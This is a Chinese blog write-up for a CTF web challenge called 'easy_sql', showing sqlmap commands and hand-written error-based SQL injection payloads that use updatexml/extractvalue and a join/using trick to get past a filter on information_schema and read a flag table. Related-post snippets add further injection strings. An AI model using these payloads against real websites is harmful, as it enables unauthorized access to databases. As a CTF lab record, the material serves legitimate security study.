第十四届信息安全竞赛-easy_sql-wp

最新推荐文章于 2024-06-18 09:47:40 发布
最新推荐文章于 2024-06-18 09:47:40 发布
阅读量152 收藏 1
点赞数
分类专栏: ctf记录
><本博客上原创文章未经本人许可,不得用于商业用途。转载请注明出处,否则保留追究法律责任的权利。><
本文链接:https://blog.csdn.net/weixin_46439278/article/details/118313173
版权

随便输入一些,发现是post注入,直接bp抓包,将数据包内容全部放到1.txt中,sqlmap跑起来

sqlmap -r 1.txt --batch

发现三种类型的注入,接着我们跑下数据库

sqlmap -r 1.txt --batch --dbs

继续,爆表试试

sqlmap -r 1.txt --batch -D security --tables

发现到这一步,sqlmap就跑不了了,所以后端php脚本肯定是过滤了某些字符串,手动测试下,这里使用报错注入来试一试

uname=admin') and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1) --+&passwd=1&Submit=%E7%99%BB%E5%BD%95

可以看到这里明显有一个过滤,waf过滤掉了information_schema库,所以需要information_shema bypass,使用join来绕过 用法join … using(xx)

先查询flag表中的字段,第一个字段id

uname=admin') and extractvalue(1,concat(0x7e,(select * from (select * from flag a join flag a)c)))--+	&passwd=1111&Submit=%E7%99%BB%E5%BD%95

第二个字段no

uname=admin') and extractvalue(1,concat(0x7e,(select * from (select * from flag a join flag using(id))c)))--+	&passwd=1111&Submit=%E7%99%BB%E5%BD%95

第三个字段

uname=admin') and extractvalue(1,concat(0x7e,(select * from (select * from flag a join flag using(id,no))c)))--+	&passwd=1111&Submit=%E7%99%BB%E5%BD%95

显然flag字段存在于第三个字段中

a017ad0b-41f8-42b5-9c13-a2b67dc471d4

接着可以回到sqlmap中继续跑下

sqlmap -r 1.txt --batch -D security -T flag -C a017ad0b-41f8-42b5-9c13-a2b67dc471d4 --dump

居上7788
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【WEB】[极客大挑战2019]EasySQL WP
Miscedence__的博客
04-15 342
0X0000000000000001 审题 其实由题目可以知道这是道SQL注入,然后看到登录,首先尝试万能密码: admin’ or ‘1’='1 如名字所说,这是一道很ez的SQL注入 通过这道题,我们来延伸一下其他东西 0X0000000000000002 关于万能密码 为什么在注入的时候输入万能密码就可以进入呢,对于所有万能密码,都是”万能“的吗? 那么首先,让我们清楚 SQL注入-万能密码的注入原理 0_用户进行用户名和密码验证时,网站需要查询数据库,查询数据库就是执行SQL语句 //
攻防世界 -- very_easy_sql
weixin_48031371的博客
09-14 7554
攻防世界 -- very_easy_sql
[2020网络安全管理职业技能竞赛全国选拔赛]easy_sql
末初的CSDN博客
11-06 779
Trick updatexml报错注入 大小写绕过过滤得字符 Fuzz测试过滤了哪些字符 查所有数据库 uname=admin')and updatexml('~',concat('~',(select mid(group_concat(schema_name),1) from inFoRmaTion_schema.schemata),'~'),'~')#&passwd=admin uname=admin')and updatexml('~',concat('~',(select m..
掌握数据处理新利器:Easy SQL
最新发布
gitblog_00022的博客
06-18 338
掌握数据处理新利器:Easy SQL easy_sqlA library developed to ease the data ETL development process.项目地址:https://gitcode.com/gh_mirrors/ea/easy_sql 在大数据时代,数据提取(Extract)、转换(Transform)和加载(Load,简称ETL)是不可或缺的关键步骤。现在,...
buuctfweb刷题wp详解及知识整理----【SUCTF 2019】EasySQL(sql注入)
weixin_45784586的博客
03-22 980
写在前面 这个题不知道查询语句的源代码是真的难写 所查看大佬的博客: https://www.cnblogs.com/chrysanthemum/p/11729891.html https://blog.csdn.net/qq_44657899/article/details/104533077 尝试之路加wp 只有一个文本提交框 发现可以堆叠注入,用show命令 可得到 库名 为ctf,表名F...
easy_sql
satasun的博客
04-19 559
easy_sql 判断注入类型(字符型注入/数字型输入) http://hwserver.bi0x.cn:8302/?id=1 and 1=1# 发现是数字型注入 判断字段数 http://hwserver.bi0x.cn:8302/?id=1 order by 3# 判断注入点 http://hwserver.bi0x.cn:8302/?id=0 union select 1,2,3# 1 2 3都是注入点 爆库名 http://hwserver.bi0x.cn:8302/?id=0 uni
S7-1200_PLC_EASY_PLUS_V4.2
08-09
西门子S7-1200学习手册chm版本
Wi-Fi_CERTIFIED_Easy_Connect_Technology_Overview_202012
05-30
Wi-Fi CERTIFIED Easy Connect™的主要特点是使用简洁的方法来配置Wi-Fi设备,无需用户输入复杂的网络信息和安全凭证。该技术可以通过扫描产品的快速响应(QR)码或触摸近场通信(NFC)标签来启用Wi-Fi网络连接,极...
S7-1200-PLC-EASY-PLUS-V4.3 1200PLC系统帮助文件、1200博途PLC编程资料 1200博途PLC
08-14
1200 PLC编程资料,S7-1200_PLC_EASY_PLUS_V4.3 1200PLC系统帮助文件、1200博途PLC编程资料 1200博途PLC
S7-1200技术参考手册EASY-PLUS-V4.3版本.zip
02-02
7. **安全功能**:S7-1200也支持安全集成,手册将讲解如何实施基本的安全功能,如安全停机、安全限速等。 8. **实例应用**:手册可能包含若干实际应用案例,帮助读者将理论知识应用于实际工程设计中。 通过深入...
简易SQL----Easy
09-07
简单化SQL增删改查,支持Access数据库。 可复制粘贴字段,方便写SQL语句。
Easysql
weixin_43610673的博客
03-04 744
无in注表名 无union select和字段名注数据 Fuzz测试过滤的关键词有: union *** select join information_schema in or and sleep benchmark if sys.schema_auto_increment_columns 因为过滤了in所以常用查询表名的方法不能用了 常用:information_schema,mysql.i...
极客大挑战easysql&[HCTF 2018]admin-wp
freerats的博客
07-17 148
极客大挑战easysql 使用报错注入 最后的flag太长,无法显示全,用substr()分成两部分即可 payload: check.php?username=1’and%20(extractvalue(1,concat(’~’,(select%20substr(password,25,50)%20from%20geekuser%20limit%203,1))))%23and%231%23 ...
[SUCTF 2019]easy_sql
Is_Linmouren的博客
09-25 192
[SUCTF 2019]easy_sql 过滤了很多字符没有去都试出来,尝试了一下存在堆叠注入想用show尝试,没有成功,确实吗解出来,去看了下大佬的wp查询语句为 select $_POST || flag from flag 并且对post传过来的值进行了过滤。如果输入的内容在预设的arr当中就会返回Nonono. 其中的|| 就代表了or,所以当输入1的时候查询就会变成select 1 || flag from flag这时查的就是select 1 from flag所以不管输入什么都是查输入的。因
[SWPUCTF 2021 新生赛]easy_sql
qq_56301349的博客
07-15 3886
[SWPUCTF 2021 新生赛]easy_sql
s7-1200_plc_easy_plusv4.6
11-15
s7-1200_plc_easy_plusv4.6是西门子推出的一款简易易用的PLC编程软件,它能够与S7-1200系列PLC进行无缝集成,帮助用户轻松快速地进行工业自动化控制系统的编程和调试。该软件具有直观的界面和丰富的功能模块,使得...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值